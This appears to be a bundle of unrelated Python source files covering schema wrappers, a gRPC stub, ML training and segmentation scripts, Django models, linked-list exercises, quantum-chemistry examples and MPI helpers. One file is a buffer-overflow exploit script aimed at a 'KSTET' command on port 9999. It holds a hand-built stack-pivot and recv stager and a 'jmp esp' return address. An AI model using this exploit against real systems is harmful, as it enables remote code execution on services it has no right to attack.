                options=lib.LYS_GETNEXT_WITHINOUT))
        except StopIteration:
            return None

    def output(self):
        """Return the rpc output node, or None if it has none."""
        try:
            return next(iter_children(
                self.context, self._node, types=(self.OUTPUT,),
                options=lib.LYS_GETNEXT_WITHINOUT))
        except StopIteration:
            return None

    def __iter__(self):
        return self.children()

    def children(self, types=None):
        return iter_children(self.context, self._node, types=types)


#------------------------------------------------------------------------------
def iter_children(context, parent, skip_keys=False, types=None, options=0):
    """Iterate over the children of `parent` (a schema node or a module).

    :arg context: the libyang Context wrapper.
    :arg parent: cffi pointer to a `struct lys_node` or `struct lys_module`.
    :arg bool skip_keys: if True, do not yield list key leafs.
    :arg tuple types: LYS_* node types to yield (defaults to data + rpc nodes).
    :arg int options: extra LYS_GETNEXT_* flags passed to lys_getnext.
    """
    if types is None:
        types = (lib.LYS_CONTAINER, lib.LYS_LIST, lib.LYS_RPC,
                 lib.LYS_LEAF, lib.LYS_LEAFLIST)

    def _skip(node):
        if node.nodetype not in types:
            return True
        if not skip_keys:
            return False
        if node.nodetype != lib.LYS_LEAF:
            return False
        leaf = ffi.cast('struct lys_node_leaf *', node)
        if lib.lys_is_key(leaf, ffi.NULL):
            return True
        return False

    # lys_getnext takes either a module (top-level iteration) or a parent node
    if ffi.typeof(parent) == ffi.typeof('struct lys_module *'):
        module = parent
        parent = ffi.NULL
    else:
        module = ffi.NULL

    child = lib.lys_getnext(ffi.NULL, parent, module, options)
    while child:
        if not _skip(child):
            yield SNode.new(context, child)
        child = lib.lys_getnext(child, parent, module, options)


#------------------------------------------------------------------------------
# compat
Container = SContainer
Leaf = SLeaf
LeafList = SLeafList
List = SList
Node = SNode
Rpc = SRpc
RpcInOut = SRpcInOut
nilq/baby-python
python
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
# NOTE: this module is regenerated from the LanguageConstantService proto
# definition; any change must be made in the .proto file, not here.
import grpc

from google.ads.google_ads.v1.proto.resources import language_constant_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_language__constant__pb2
from google.ads.google_ads.v1.proto.services import language_constant_service_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_language__constant__service__pb2


class LanguageConstantServiceStub(object):
  """Service to fetch language constants.
  """

  def __init__(self, channel):
    """Constructor.

    Args:
      channel: A grpc.Channel.
    """
    # unary-unary RPC: GetLanguageConstantRequest -> LanguageConstant
    self.GetLanguageConstant = channel.unary_unary(
        '/google.ads.googleads.v1.services.LanguageConstantService/GetLanguageConstant',
        request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_language__constant__service__pb2.GetLanguageConstantRequest.SerializeToString,
        response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_language__constant__pb2.LanguageConstant.FromString,
        )


class LanguageConstantServiceServicer(object):
  """Service to fetch language constants.
  """

  def GetLanguageConstant(self, request, context):
    """Returns the requested language constant.
    """
    # default stub implementation: servers override this method
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')


def add_LanguageConstantServiceServicer_to_server(servicer, server):
  # Register the servicer's handlers under the fully-qualified service name.
  rpc_method_handlers = {
      'GetLanguageConstant': grpc.unary_unary_rpc_method_handler(
          servicer.GetLanguageConstant,
          request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_language__constant__service__pb2.GetLanguageConstantRequest.FromString,
          response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_language__constant__pb2.LanguageConstant.SerializeToString,
      ),
  }
  generic_handler = grpc.method_handlers_generic_handler(
      'google.ads.googleads.v1.services.LanguageConstantService', rpc_method_handlers)
  server.add_generic_rpc_handlers((generic_handler,))
nilq/baby-python
python
import logging

from torch.utils.tensorboard import SummaryWriter

from utils.utils_common import DataModes
import torch

logger = logging.getLogger(__name__)


class Trainer(object):
    """Runs the training loop for a network, logging losses to TensorBoard
    and delegating periodic evaluation to an Evaluator."""

    def training_step(self, data, epoch):
        """Run one optimization step on a single minibatch.

        :arg data: an (x, y) minibatch pair from the trainloader.
        :arg epoch: current epoch index (unused here, kept for interface
            compatibility with callers/overrides).
        :returns: the loss log dict produced by ``net.loss``.
        """
        # Get the minibatch
        x, y = data

        self.optimizer.zero_grad()
        loss, log = self.net.loss(x, y)
        loss.backward()
        self.optimizer.step()

        return log

    def __init__(self, net, trainloader, optimizer, epoch_count, eval_every,
                 save_path, evaluator, log_msg):
        self.net = net
        self.trainloader = trainloader
        self.optimizer = optimizer
        self.numb_of_epochs = epoch_count
        self.eval_every = eval_every
        self.save_path = save_path
        self.evaluator = evaluator
        self.log_msg = log_msg

    def train(self):
        """Train for ``numb_of_epochs`` epochs, logging accumulated losses
        and evaluating every ``eval_every`` epochs."""
        logger.info("Start training...")

        writer = SummaryWriter(self.save_path)

        # Losses are accumulated across eval_every epochs, then logged
        # (averaged per epoch) and reset.
        running_loss = {}
        for epoch in range(self.numb_of_epochs):  # loop over the dataset multiple times

            for data in self.trainloader:
                # training step
                loss = self.training_step(data, epoch)

                # accumulate statistics.
                # BUGFIX: the original used `... if key in running_loss else 0`,
                # which silently dropped the first value of every key.
                for key, value in loss.items():
                    running_loss[key] = running_loss.get(key, 0) + value

            if epoch % self.eval_every == self.eval_every - 1:  # print every K epochs
                logger.info('epoch: {}, tr_loss: {:4f}'.format(
                    epoch, running_loss['loss'] / self.eval_every))
                for key, value in running_loss.items():
                    writer.add_scalar(DataModes.TRAINING + '/' + key, value, epoch)

                self.evaluator.evaluate(epoch, writer)
                # BUGFIX: the original reset to the float 0.0, which made the
                # next `key in running_loss` raise TypeError; reset to a dict.
                running_loss = {}

        logger.info("... end of training!")
nilq/baby-python
python
from datetime import datetime

from . import db, ma


class NRNumber(db.Model):
    """Tracks the last issued NR (name request) number so the next one can
    be generated sequentially."""

    __tablename__ = 'nr_number'

    # core fields
    id = db.Column(db.Integer, primary_key=True)
    nrNum = db.Column('nr_num', db.String(10), unique=True)
    lastUpdate = db.Column('last_update', db.DateTime(timezone=True),
                           default=datetime.utcnow, onupdate=datetime.utcnow)

    @classmethod
    def get_next_nr_num(cls, last_nr):
        """Return the NR number that follows `last_nr`.

        Format: 4-character header followed by a 6-digit counter.  When the
        counter is exhausted ('999999'), the counter wraps to '000000' and
        the header's final character is advanced to the next letter.

        BUGFIX: the original left `next_nr_header` unassigned in the
        rollover branch (the assignment was only a comment), raising
        NameError at 'nr_header + number'.

        :raises ValueError: if the header letter cannot be advanced further.
        """
        last_nr_header = last_nr[0:4]
        last_number = last_nr[4:10]
        if last_number == '999999':
            # Advance the final header letter, e.g. 'NR A' -> 'NR B'.
            # NOTE(review): assumes the 4th header character is a letter in
            # A..Y — confirm the real numbering scheme with the business rules.
            if last_nr_header[-1] >= 'Z':
                raise ValueError('NR number range exhausted: ' + last_nr)
            next_nr_header = last_nr_header[:-1] + chr(ord(last_nr_header[-1]) + 1)
            next_number = '000000'
        else:
            next_nr_header = last_nr_header
            next_number = str((int(last_number) + 1)).zfill(6)

        next_nr_num = next_nr_header + next_number
        return (next_nr_num)

    def json(self):
        """Return a plain-dict representation of this row."""
        return {'id': self.id,
                'nrNum': self.nrNum
                }

    def save_to_db(self):
        """Add this row to the session and commit immediately."""
        db.session.add(self)
        db.session.commit()


class NRNumberSchema(ma.ModelSchema):
    """Marshmallow schema auto-derived from the NRNumber model."""

    class Meta:
        model = NRNumber
python
""" This module provides some helper methods to deal with multidimensional arrays of different axes order. """ import numpy as np def adjustOrder(volume, inputAxes, outputAxes="txyzc"): """ This method allows to convert a given `volume` (with given `inputAxes` ordering) into a different axis ordering, specified as `outputAxes` string (e.g. "xyzt"). Allowed axes are `t`, `x`, `y`, `z`, `c`. The default format volumes are converted to is "txyzc", axes that are missing in the input volume are created with size 1. """ assert isinstance(volume, np.ndarray) assert len(volume.shape) == len(inputAxes) assert len(outputAxes) >= len(inputAxes) assert not any(a not in "txyzc" for a in outputAxes) assert not any(a not in "txyzc" for a in inputAxes) outVolume = volume # find present and missing axes positions = {} missingAxes = [] for axis in outputAxes: try: positions[axis] = inputAxes.index(axis) except ValueError: missingAxes.append(axis) # insert missing axes at the end for m in missingAxes: outVolume = np.expand_dims(outVolume, axis=-1) positions[m] = outVolume.ndim - 1 # transpose axesRemapping = [positions[a] for a in outputAxes] outVolume = np.transpose(outVolume, axes=axesRemapping) return outVolume def getFrameSlicing(inputAxes, selectValue, selectAxis="t"): """ This methods helps to get a slice of a multidimensional array of the specified `inputAxes`, where only for one specific axis (`selectAxis`) an index (or a list of indices, or a slicing object) is given. Example: `myarray[getFrameSlicing('xzt', 3, t)]` Example: `myarray[getFrameSlicing('xzt', [3,7,9], t)]` """ assert len(selectAxis) == 1 assert inputAxes.count(selectAxis) == 1 slicing = tuple() for a in inputAxes: if a == selectAxis: slicing += (selectValue,) else: slicing += (slice(None),) return slicing
nilq/baby-python
python
from keras.models import load_model
from glob import glob
import keras
import numpy as np
from losses import *
import random
from keras.models import Model
from extract_patches import Pipeline
from scipy.misc import imresize
from keras.utils import np_utils
import SimpleITK as sitk
import pdb
import matplotlib.pyplot as plt
import os
from scipy.ndimage.measurements import label
import cv2
from scipy.ndimage.morphology import binary_dilation, generate_binary_structure
import matplotlib.gridspec as gridspec
import imgaug as ia
import imgaug.augmenters as iaa
from imgaug import parameters as iap
# from evaluation_metrics import *

path_HGG = glob('/home/pi/Projects/beyondsegmentation/HGG/**')
path_LGG = glob('/home/pi/Projects/beyondsegmentation/LGG**')

test_path = glob('/home/parth/Interpretable_ML/BraTS_2018/val/**')
np.random.seed(2022)
np.random.shuffle(test_path)


def normalize_scheme(slice_not):
    '''
        normalizes each slice, excluding gt
        subtracts mean and div by std dev for each slice
        clips top and bottom one percent of pixel intensities
    '''
    # 4 modalities x 155 slices x 240 x 240 (BraTS volume layout)
    normed_slices = np.zeros((4, 155, 240, 240))
    for slice_ix in range(4):
        normed_slices[slice_ix] = slice_not[slice_ix]
        for mode_ix in range(155):
            normed_slices[slice_ix][mode_ix] = _normalize(slice_not[slice_ix][mode_ix])

    return normed_slices


def _normalize(slice):
    """Clip to the 1st/99th percentile, then zero-mean/unit-std normalize
    using only non-zero (brain) voxels; background min is forced to -9."""
    b = np.percentile(slice, 99)
    t = np.percentile(slice, 1)
    slice = np.clip(slice, t, b)
    image_nonzero = slice[np.nonzero(slice)]
    if np.std(slice) == 0 or np.std(image_nonzero) == 0:
        return slice
    else:
        tmp = (slice - np.mean(image_nonzero)) / np.std(image_nonzero)
        tmp[tmp == tmp.min()] = -9
        return tmp


def load_vol(filepath_image, model_type, slice_):
    '''
    segment the input volume
    INPUT   (1) str 'filepath_image': filepath of the volume to predict
            (2) str 'model_type': 'dense' pads slices by 8px on each side
            (3) int 'slice_': index of the axial slice to extract
    OUTPUT  (1) np array of the predicted volume
            (2) np array of the corresponding ground truth
    '''
    # read the volume (one file per modality plus the segmentation)
    flair = glob(filepath_image + '/*_flair.nii.gz')
    t2 = glob(filepath_image + '/*_t2.nii.gz')
    gt = glob(filepath_image + '/*_seg.nii.gz')
    t1s = glob(filepath_image + '/*_t1.nii.gz')
    t1c = glob(filepath_image + '/*_t1ce.nii.gz')
    # *_t1.nii.gz glob also matches *_t1ce.nii.gz; filter the latter out
    t1 = [scan for scan in t1s if scan not in t1c]
    if (len(flair) + len(t2) + len(gt) + len(t1) + len(t1c)) < 5:
        print("there is a problem here!!! the problem lies in this patient :")
    scans_test = [flair[0], t1[0], t1c[0], t2[0], gt[0]]
    test_im = [sitk.GetArrayFromImage(sitk.ReadImage(scans_test[i]))
               for i in range(len(scans_test))]
    test_im = np.array(test_im).astype(np.float32)
    test_image = test_im[0:4]
    gt = test_im[-1]
    gt[gt == 4] = 3  # remap label 4 (enhancing tumor) to 3 for dense output

    # normalize each slice following the same scheme used for training
    test_image = normalize_scheme(test_image)

    # transform the data to channels_last keras format
    test_image = test_image.swapaxes(0, 1)
    test_image = np.transpose(test_image, (0, 2, 3, 1))

    test_image, gt = np.array(test_image[slice_]), np.array(gt[slice_])
    if model_type == 'dense':
        npad = ((8, 8), (8, 8), (0, 0))
        test_image = np.pad(test_image, pad_width=npad,
                            mode='constant', constant_values=0)
        npad = ((8, 8), (8, 8))
        gt = np.pad(gt, pad_width=npad, mode='constant', constant_values=0)
    return test_image, gt


class Test_Time_Augmentation():
    """Monte-Carlo test-time augmentation: run the model on many randomly
    augmented copies of an image and report per-pixel mean and variance."""

    def __init__(self):
        # BUGFIX: the augmenter used to be built here from the *global*
        # test_image; it is now built per-call from the image actually given
        # to predict_aleatoric.
        self.aug = None

    def _build_augmenter(self, test_image):
        """Return a random pipeline of 3 of the 4 augmenters below."""
        return iaa.SomeOf(3, [iaa.Affine(
                                  rotate=iap.Normal(0.0, 3),
                                  translate_px=iap.Normal(0.0, 3)),
                              iaa.AdditiveGaussianNoise(
                                  scale=0.3 * np.ptp(test_image) - 9),
                              iaa.Noop(),
                              iaa.MotionBlur(k=3, angle=[-2, 2])
                              ], random_order=True)

    def predict_aleatoric(self, model, test_image, iterations=1000, dropout=0.5):
        """Predict `iterations` times on augmented copies of `test_image`
        and plot the mean segmentation and its variance.

        :arg dropout: kept for interface compatibility; not used here
            (aleatoric uncertainty comes from input augmentation).
        """
        self.aug = self._build_augmenter(test_image)
        predictions = []
        for i in range(iterations):
            # BUGFIX: the original referenced an undefined global `aug`
            aug_image = self.aug.augment_images(test_image)
            predictions.append(model.predict(aug_image))

        predictions = np.array(predictions)
        mean = np.mean(predictions, axis=0)
        var = np.var(predictions, axis=0)

        print(mean.shape)
        plt.imshow(np.argmax(mean, axis=-1).reshape((240, 240)),
                   vmin=0., vmax=3.)
        plt.show()
        plt.figure(figsize=(8, 8))
        # variance averaged over the non-background classes
        plt.imshow(np.mean(var[:, :, :, 1:], axis=-1).reshape((240, 240)))
        plt.colorbar()
        plt.show()


if __name__ == '__main__':
    # BUGFIX: load_vol requires model_type and slice_; the original call
    # omitted both.  NOTE(review): slice 78 is an arbitrary mid-volume
    # axial slice — adjust as needed.
    test_image, gt = load_vol(test_path[0], 'unet', 78)
    model = load_model('/home/parth/Interpretable_ML/Brain-tumor-segmentation/checkpoints/Unet_MC/UnetRes_MC.h5')
    model.load_weights('/home/parth/Interpretable_ML/Brain-tumor-segmentation/checkpoints/Unet_MC/UnetRes.60_1.066.hdf5', by_name=True)
    D = Test_Time_Augmentation()
    # BUGFIX: the original passed an undefined name `model_res`
    D.predict_aleatoric(model, test_image, iterations=100, dropout=0.)
nilq/baby-python
python
class Node:
    """A singly-linked-list node holding a value and a next pointer."""

    def __init__(self, value):
        self.value = value
        self.next = None

    def __repr__(self):
        return str(self.value)


class LinkedList:
    """Minimal singly linked list supporting append, pop-from-head and size."""

    def __init__(self):
        self.head = None

    def __str__(self):
        cur_head = self.head
        out_string = ""
        while cur_head:
            out_string += str(cur_head.value) + " -> "
            cur_head = cur_head.next
        return out_string

    def append(self, value):
        """Append `value` at the tail (O(n) — walks the whole list)."""
        if self.head is None:
            self.head = Node(value)
            return

        node = self.head
        while node.next:
            node = node.next
        node.next = Node(value)

    def pop(self):
        """Remove and return the head node, or None if the list is empty."""
        if self.head is None:
            return None
        node = self.head
        self.head = self.head.next
        return node

    def size(self):
        """Return the number of nodes in the list."""
        size = 0
        node = self.head
        while node:
            size += 1
            node = node.next
        return size


def union(llist_1, llist_2):
    """Return a LinkedList of the distinct values found in either list.

    NOTE: consumes (empties) both input lists, as the original did.
    Output order is unspecified (set iteration order).
    """
    union_set = set()
    output = LinkedList()
    while llist_1.head is not None:
        union_set.add(llist_1.pop().value)
    while llist_2.head is not None:
        union_set.add(llist_2.pop().value)
    for num in union_set:
        output.append(num)
    return output


def intersection(llist_1, llist_2):
    """Return a LinkedList of values present in both lists (consumes inputs)."""
    l1_set = set()
    l2_set = set()
    output = LinkedList()
    while llist_1.head is not None:
        l1_set.add(llist_1.pop().value)
    while llist_2.head is not None:
        l2_set.add(llist_2.pop().value)
    # set intersection instead of the original manual membership loop
    for num in l1_set & l2_set:
        output.append(num)
    return output


# Union test case 1 - union exists
linked_list_1 = LinkedList()
linked_list_2 = LinkedList()

element_1 = [3, 2, 4, 35, 6, 65, 6, 4, 3, 21]
element_2 = [6, 32, 4, 9, 6, 1, 11, 21, 1]
solution = [1, 2, 3, 4, 6, 9, 11, 21, 32, 35, 65]

for i in element_1:
    linked_list_1.append(i)
for j in element_2:
    linked_list_2.append(j)

output = union(linked_list_1, linked_list_2)
output_list = []
while output.head:
    output_list.append(output.pop().value)
output_list.sort()

if output_list == solution:
    print("Test case 1 union: Pass!")
else:
    print("Test case 1 union: FAIL.")

# Intersection test case 1 - intersection exists
linked_list_1 = LinkedList()
linked_list_2 = LinkedList()

for i in element_1:
    linked_list_1.append(i)
for j in element_2:
    linked_list_2.append(j)

solution = [4, 6, 21]
output = intersection(linked_list_1, linked_list_2)
output_list = []
while output.head:
    output_list.append(output.pop().value)

if sorted(output_list) == solution:
    print("Test case 1 intersection: Pass!")
else:
    print("Test case 1 intersection: FAIL.")

# Union test case 2 - union exists
linked_list_3 = LinkedList()
linked_list_4 = LinkedList()

element_1 = [3, 2, 4, 35, 6, 65, 6, 4, 3, 23]
element_2 = [1, 7, 8, 9, 11, 21, 1]
solution = [1, 2, 3, 4, 6, 7, 8, 9, 11, 21, 23, 35, 65]

for i in element_1:
    linked_list_3.append(i)
for i in element_2:
    linked_list_4.append(i)

output = union(linked_list_3, linked_list_4)
output_list = []
while output.head:
    output_list.append(output.pop().value)

if sorted(output_list) == solution:
    print("Test case 2 union: Pass!")
else:
    print("Test case 2 union: FAIL.")

# Intersection test case 2 - intersection does not exist
linked_list_3 = LinkedList()
linked_list_4 = LinkedList()

for i in element_1:
    linked_list_3.append(i)
for i in element_2:
    linked_list_4.append(i)

solution = []
# BUGFIX: the original intersected linked_list_1/2 (already emptied by
# test case 1) and only passed by coincidence.
output = intersection(linked_list_3, linked_list_4)
output_list = []
while output.head:
    output_list.append(output.pop().value)

if sorted(output_list) == solution:
    print("Test case 2 intersection: Pass!")
else:
    print("Test case 2 intersection: FAIL.")

# Union test case 3 - union of empty sets
linked_list_3 = LinkedList()
linked_list_4 = LinkedList()

element_1 = []
element_2 = []
solution = []

for i in element_1:
    linked_list_3.append(i)
for i in element_2:
    linked_list_4.append(i)

output = union(linked_list_3, linked_list_4)
output_list = []
while output.head:
    output_list.append(output.pop().value)

if sorted(output_list) == solution:
    print("Test case 3 union: Pass!")
else:
    print("Test case 3 union: FAIL.")

# Intersection test case 3 - intersection of empty sets
linked_list_3 = LinkedList()
linked_list_4 = LinkedList()

for i in element_1:
    linked_list_3.append(i)
for i in element_2:
    linked_list_4.append(i)

solution = []
# BUGFIX: same wrong-variable bug as test case 2.
output = intersection(linked_list_3, linked_list_4)
output_list = []
while output.head:
    output_list.append(output.pop().value)

if sorted(output_list) == solution:
    print("Test case 3 intersection: Pass!")
else:
    print("Test case 3 intersection: FAIL.")
nilq/baby-python
python
# Generated by Django 2.2.12 on 2020-07-18 19:09 import ckeditor.fields from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('core', '0019_order_refrence_code'), ] operations = [ migrations.AlterField( model_name='historicalitem', name='additional_info', field=ckeditor.fields.RichTextField(blank=True, null=True), ), migrations.AlterField( model_name='historicalitem', name='description', field=ckeditor.fields.RichTextField(), ), migrations.AlterField( model_name='item', name='additional_info', field=ckeditor.fields.RichTextField(blank=True, null=True), ), migrations.AlterField( model_name='item', name='description', field=ckeditor.fields.RichTextField(), ), ]
nilq/baby-python
python
import unittest

import math_module


class TestMath(unittest.TestCase):
    """Unit tests for math_module's Analysis class and calc_ratio helper."""

    def setUp(self):
        # Reference zircon analysis used by the age test; the trailing
        # zero triples are unused isotope inputs for this fixture.
        zeros = (0, 0, 0)
        self.zir = math_module.Analysis(
            'test_zircon', 15,
            (0.2003, 0.0008, 0.0046),
            (2.082, 0.009, 0.07),
            0.6, 0.6,
            (0.0617, 0.0003, 0.0003),
            (0.758, 0.0003, 0.0015),
            zeros, zeros, zeros, zeros, zeros, zeros, zeros,
            1)

    def tearDown(self):
        pass

    def test_calc_ratio(self):
        ratio = math_module.calc_ratio(1000)[0]
        self.assertEqual(ratio, 0.16780392747297124)

    def test_analysis(self):
        age = self.zir.calc_age(0)[0]
        self.assertEqual(round(age, 0), 1177)


if __name__ == '__main__':
    unittest.main()
nilq/baby-python
python
# Central registry of filesystem locations used by the reporting scripts.
PATHS = {
    'REPOS_FILE': 'config/repos.json',
    'DAILY_REPORTS_PATH': 'reports/daily',
    'WEEKLY_REPORTS_PATH': 'reports/weekly',
}
nilq/baby-python
python
from django.contrib import admin
from django.utils.html import format_html

from ddweb.apps.references.models import Reference


class ReferenceAdmin(admin.ModelAdmin):
    """Admin list view for Reference with a per-row image-upload link."""

    list_display = (
        "ship",
        "year",
        "description",
        "ongoing",
        "beforeDD",
        "image_admin_url",
    )

    def image_admin_url(self, obj):
        # format_html escapes obj.id and marks the result safe.
        # BUGFIX: `allow_tags = True` was removed in Django 2.0; raw HTML
        # returned without format_html is escaped and rendered as text.
        return format_html(
            '<a href="/images/uploadf/reference/{}">Upload images</a>', obj.id
        )

    # harmless no-op on Django >= 2.0, keeps pre-2.0 installs working
    image_admin_url.allow_tags = True
    image_admin_url.short_description = "Images"


admin.site.register(Reference, ReferenceAdmin)
nilq/baby-python
python
#!/usr/bin/env python
import numpy
import numpy.linalg
# BUGFIX: `reduce` is used below but was never imported; on Python 3 it is
# no longer a builtin (functools.reduce exists since Python 2.6, so this
# import is safe on both major versions).
from functools import reduce
from pyscf import gto, scf, mcscf

mol = gto.M(atom=['H 0 0 %f'%i for i in range(10)],
            unit='Bohr',
            basis='ccpvtz')

#
# A regular SCF calculation for this sytem will raise a warning message
#
# Warn: Singularity detected in overlap matrix (condition number = 5.47e+09). SCF may be inaccurate and hard to converge.
#
# The linear dependency can cause HF, MCSCF etc methods converging to wrong
# answer.  This example shows how to remove linear dependency from overlap
# matrix and use the linearly independent basis in the HF, MCSCF calculations.
#
# There is a shortcut function to remove linear-dependency, eg
#
#       mf = scf.RHF(mol).apply(scf.addons.remove_linear_dep_)
#
# This example demonstrated how the linear dependency is removed in our
# implementation.
#

#
# The smallest eigenvalue of overlap matrix is 10^{-9}
#
s = mol.intor('cint1e_ovlp_sph')
print(numpy.linalg.eigh(s)[0][:8])
#[  1.96568587e-09   8.58358923e-08   7.86870520e-07   1.89728026e-06
#   2.14355169e-06   8.96267338e-06   2.46812168e-05   3.26534277e-05]

def eig(h, s):
    """Generalized eigensolver that projects out near-singular directions
    of the overlap matrix s (eigenvalues <= 1e-8) before diagonalizing h."""
    d, t = numpy.linalg.eigh(s)
    # Removing the eigenvectors assoicated to the smallest eigenvalue, the new
    # basis defined by x matrix has 139 vectors.
    x = t[:,d>1e-8] / numpy.sqrt(d[d>1e-8])
    xhx = reduce(numpy.dot, (x.T, h, x))
    e, c = numpy.linalg.eigh(xhx)
    c = numpy.dot(x, c)
    # Return 139 eigenvalues and 139 eigenvectors.
    return e, c

#
# Replacing the default eig function with the above one,  the HF solver
# generate only 139 canonical orbitals
#
mf = scf.RHF(mol)
mf.eig = eig
mf.verbose = 4
mf.kernel()

#
# The CASSCF solver takes the HF orbital as initial guess.  The MCSCF problem
# size is (0 core, 10 active, 129 external) orbitals.  This information can be
# found in the output.
#
mc = mcscf.CASSCF(mf, 10, 10)
mc.verbose = 4
mc.kernel()

#
# For symmetry adapted calculation, similar treatments can be applied.
#
# Here by assigning symmetry=1, mol.irrep_name, mol.irrep_id and mol.symm_orb
# (see pyscf/gto/mole.py) are initialized in the mol object.  They are the
# irrep symbols, IDs, and symmetry-adapted-basis.
#
mol = gto.M(atom=['H 0 0 %f'%i for i in range(10)],
            unit='Bohr',
            basis='ccpvtz',
            symmetry=1)

#
# The smallest eigenvalue is associated to A1u irrep.  Removing the relevant
# basis will not break the symmetry
#
s = mol.intor('cint1e_ovlp_sph')
for i, c in enumerate(mol.symm_orb):
    s1 = reduce(numpy.dot, (c.T, s, c))
    print(mol.irrep_name[i], numpy.linalg.eigh(s1)[0])
#A1g [  8.58358928e-08   2.14355169e-06   2.46812168e-05   3.26534277e-05
#...
#E1gx [  1.67409011e-04   2.38132838e-03   4.51022127e-03   9.89429994e-03
#...
#E1gy [  1.67409011e-04   2.38132838e-03   4.51022127e-03   9.89429994e-03
#...
#A1u [  1.96568605e-09   7.86870519e-07   1.89728026e-06   8.96267338e-06
#...

# pyscf/scf/hf_symm.py
def eig(h, s):
    """Symmetry-adapted variant: remove linear dependency separately within
    each irreducible representation so the point-group symmetry is preserved."""
    from pyscf import symm
    nirrep = len(mol.symm_orb)
    h = symm.symmetrize_matrix(h, mol.symm_orb)
    s = symm.symmetrize_matrix(s, mol.symm_orb)
    cs = []
    es = []
    #
    # Linear dependency are removed by looping over different symmetry irreps.
    #
    for ir in range(nirrep):
        d, t = numpy.linalg.eigh(s[ir])
        x = t[:,d>1e-8] / numpy.sqrt(d[d>1e-8])
        xhx = reduce(numpy.dot, (x.T, h[ir], x))
        e, c = numpy.linalg.eigh(xhx)
        cs.append(reduce(numpy.dot, (mol.symm_orb[ir], x, c)))
        es.append(e)
    e = numpy.hstack(es)
    c = numpy.hstack(cs)
    return e, c

mf = scf.RHF(mol)
mf.eig = eig
mf.verbose = 4
mf.kernel()

mc = mcscf.CASSCF(mf, 10, 10)
mc.verbose = 4
mc.kernel()
nilq/baby-python
python
from numpy import prod def persistence(n): if n < 10: return 0 nums = [int(x) for x in str(n)] steps = 1 while prod(nums) > 9: nums = [int(x) for x in str(int(prod(nums)))] steps += 1 return steps
nilq/baby-python
python
#!/usr/bin/python # -*- coding: utf-8 -*- import sys import socket from time import sleep from struct import * host= "172.30.200.66" port = 9999 payload = "" # Estagio 2 -> Realinhamento da pilha para encontrar o FileDescriptor payload += "\x54" # push esp payload += "\x59" # pop ecx payload += "\x66\x81\xE9\x44\x01" # sub cx,0x144 # Reajusta a posição de ESP # como o ESP (pilha) está abaixo deste payload, iremos reajustar para uma posição acima payload += "\x83\xEC\x50" # sub esp 50 # Estagio 3 -> Calcular parametros do recv # int recv( SOCKET s, char *buf, int len, int flags ); # Adiciona o 4 parametro (flags) payload += "\x31\xC0" # xor eax,eax --> Zera EAX payload += "\x50" # push eax # Adiciona o 3 parametro (int) payload += "\x31\xC0" # xor eax,eax --> Zera EAX payload += "\xB0\x08" # mov al,0x8 payload += "\xB4\x02" # mov ah,0x2 payload += "\x50" # push eax --> EAX deve ter o valor 0x00000208 decimal 520 # Adiciona o 2 parametro (*buf), ou seja endereço do Buffer payload += "\x54" # push esp payload += "\x5A" # pop edx payload += "\x83\xC2\x50" # ADD EDX, 50 payload += "\x52" # push edx # Adiciona o 1 parametro (socket) payload += "\xFF\x31" # PUSH DWORD PTR DS:[ECX] payload += "\xCC" # Breakpoint payload += "\x90" * (66 - len(payload)) # preenche com NOPs payload += pack('<L',0x625011af) # 0x625011af : jmp esp | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (essfunc.dll) # Estagio 1 -> JMP para o inicio do nosso payload (AAAA...) payload += "\x54" # push esp payload += "\x5A" # pop edx payload += "\x83\xEA\x46" # sub edx,byte +0x46 payload += "\xFF\xE2" # jmp edx buffer = b"KSTET /.:/" buffer += payload shellcode = "E" * 520 print "[*] Enviando requisicao maliciosa ... :)" exp = socket.socket(socket.AF_INET, socket.SOCK_STREAM) exp.connect((host,port)) exp.recv(4096) exp.send(buffer) exp.close()
nilq/baby-python
python
from mpi4py import MPI comm = MPI.COMM_WORLD rank = comm.Get_rank() size = comm.Get_size() import numpy as np ################################################################################ ### ### USAGE ### list_of_objects = parutil.init(list_of_object) ### ### DO WHAT YOU WANT ### list_of object = parutil.finish(list_of_objects) ### ################################################################################ def init(iterable): iterable = scatter(iterable) return iterable def finish(iterable, barrier=True): iterable = bcast(gather(iterable)) if barrier: comm.Barrier() return iterable def scatter(iterable): """Scatter iterable as chunks to the cores. N.B.: len(iterable) == size after scattering!""" iterable = comm.scatter(chop(iterable)) return iterable def gather(iterable, keep_order=True, keep_type=True): iterable = comm.gather(iterable) if rank == 0: itertype = type(iterable) iterable = sum(iterable,[]) if keep_order: natural = range(len(iterable)) mixed = chop(natural) try: mixed = sum(mixed,[]) except TypeError: ### list elements are generators! mixed = [list(i) for i in mixed] mixed = sum(mixed,[]) order = np.argsort(mixed) iterable = np.array(iterable)[order] if keep_type == True: if itertype in [list, tuple, set, frozenset]: iterable = itertype(iterable) elif itertype is not np.ndarray: raise NotImplementedError("NOT TESTED") return iterable def bcast(iterable): iterable = comm.bcast(iterable) return iterable def chop(iterable): """Chop an iterable into (quasi)-equally long chunks. Automatically handle non-multiplier! ( len(iterable)%size != 0 ) Core function for parallelization""" chunks = [iterable[i::size] for i in range(size)] return chunks
nilq/baby-python
python
#!/usr/bin/env python import argparse parser = argparse.ArgumentParser() parser.add_argument("-i", "--input", type=str, help="database file input") parser.add_argument("-o", "--output", type=str, help="filtered fasta output") parser.add_argument("-k", "--keyword", type=str, help="filter records to include keyword") args = parser.parse_args() rec_dict = {} with open(args.input, "r") as ifile: line = ifile.readline() while line != "": header = line line = ifile.readline() seq = "" while line != "" and line[0] != ">": seq += line.strip() line = ifile.readline() rec_dict[header] = seq with open(args.output, "w") as ofile: for rec in rec_dict.keys(): if args.keyword in rec: ofile.write(F"{rec}{rec_dict[rec]}\n")
nilq/baby-python
python
